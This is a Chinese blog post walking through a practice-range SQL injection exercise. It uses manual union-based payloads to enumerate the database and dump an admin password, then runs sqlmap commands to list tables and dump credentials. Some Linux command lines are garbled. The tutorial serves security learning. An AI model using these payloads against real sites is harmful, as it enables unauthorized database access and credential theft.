第一次靶场练习:SQL注入(1)

SQL注入1

本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责

一、学习目的:

  • 利用手工注入网站
  • 利用sqlmab注入

二、附件说明

  • 靶场网址:http://117.41.229.122:8003/?id=1
  • 工具sqlmap下载:https://download.csdn.net/download/qq_41803637/10911556
  • sqlmap使用说明:https://www.cnblogs.com/ichunqiu/p/5805108.html

三、手工注入

1、判断有无注入点

代码1

1
http://117.41.229.122:8003/?id=1 and 1=1

实践1

回车后导航条,显示下面的情景,是正常现象,不用管

代码2

1
http://117.41.229.122:8003/?id=1 and 1=2

实践2

 

说明:两个效果不一样,说明有注入点

 

2、猜测注入点的数量

代码

1
关键词:order by 注入点数量http://117.41.229.122:8003/?id=1 order by 50

实践

说明注入点判断错误

 

说明注入点判断成功

说明:注入点的个数为2

 

3、查询显现字段

代码

 

1
关键字:union selecthttp://117.41.229.122:8003/?id=1 and 1=2 union select 1,2说明:
  • 为方便显示显现的字段,所以特意设置 and 1-2
  • 前面测出有几个注入点,就在select后面输入从1到n的几个数

 

实践

说明:显现字段为2

 

4、查询数据库版本

代码

1
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,version()注意:在显现字段处,写查询的事务

实践

说明:版本为MySQL 5.5.53

 

5、查询数据库

代码

1
http://117.41.229.122:8003/?id=1 and 1=2 union select 1,database()

实践

说明:数据库名为maoshe

 

6、查询数据表

代码

1
http://117.41.229.122:8003/?id=1 and 1=2 UNION SELECT 1,table_name from information_schema.tables where table_schema=database() 

实践

说明:在数据库maoshe里面有一个数据表admin

 

7、查找密码

代码

1
http://117.41.229.122:8003/?id=1  and 1=2 UNION SELECT 1,password from admin

实践

说明:密码为hellohack

 

四、sqlmap注入

 

1、猜解是否能注入

 

win: python sqlmap.py -u "网址?id=1"  【id等于几可以随便输入,但是必须输入且只能为数字】
Linux : .lmap.py -u "网址?id=7"   【id等于几可以随便输入,但是必须输入且只能为数字】

 

后面为方便理解,全部以网址放置

 

 

2、猜解表

 

win: python sqlmap.py -u "http://117.41.229.122:8003/?id=1" --tables
Linux: .lmap.py -u "http://117.41.229.122:8003/?id=1" --tables

 

 

3、 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

 

win: python sqlmap.py -u "http://117.41.229.122:8003/?id=1" --columns -T admin
Linux: .lmap.py -u "http://117.41.229.122:8003/?id=1" --columns -T admin

 

 

4、 根据字段猜解内容(假如通过3得到字段为username和password)

 

win: python sqlmap.py -u "http://117.41.229.122:8003/?id=1" --dump -T admin -C "username,password" 
Linux: .lmap.py -u "http://117.41.229.122:8003/?id=1" --dump -T admin -C "username,[url=]B[/url]password" 

posted on   迷途行者  阅读(11250)  评论(2编辑  收藏  举报

编辑推荐:
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 如何调用 DeepSeek 的自然语言处理 API 接口并集成到在线客服系统
· 【译】Visual Studio 中新的强大生产力特性
· 2025年我用 Compose 写了一个 Todo App

导航

< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5
点击右上角即可分享
微信分享提示